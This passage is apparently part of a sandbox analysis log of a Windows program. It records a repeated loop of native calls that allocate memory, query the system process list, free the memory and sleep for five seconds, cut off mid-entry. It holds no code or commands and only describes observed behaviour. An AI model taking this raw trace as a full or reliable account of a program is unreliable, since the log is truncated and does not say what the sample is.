RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.973] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.974] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.975] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.975] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.979] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.980] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.982] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.982] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.983] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.984] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.984] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.989] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.989] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.991] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.991] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.993] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.993] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.993] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.997] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.998] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.000] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.000] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.001] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.001] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.002] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.006] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.007] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.009] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.009] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.010] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.010] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.010] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.015] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.016] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.017] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.018] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.019] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.019] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.019] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.024] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.025] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.027] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.027] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.028] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.029] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.029] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.034] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.035] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.037] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.037] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.038] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.038] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.038] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.043] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.043] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.045] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.046] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.047] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.047] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.047] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.052] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.052] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.054] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.055] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.056] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.056] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.060] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.061] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.064] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.064] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.065] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.066] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.066] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.071] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.071] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.073] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.073] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.075] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.075] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.075] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.081] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.082] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.083] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.083] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.084] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.085] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.085] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.090] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.090] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.092] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.092] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.093] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.094] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.094] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.100] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.101] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.103] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.103] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.104] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.105] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.105] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.110] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.112] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.114] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.114] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.115] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.115] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.115] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.120] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.121] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.123] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.123] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.125] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.126] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.128] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.133] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.134] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.135] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.136] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.137] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.137] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.137] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.142] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.143] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.145] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.145] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.146] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.146] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.147] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.152] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.153] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.154] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.155] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.156] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.156] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.156] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0273.161] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0273.162] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0273.164] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0273.164] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0273.165] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0273.165] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0273.165] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) 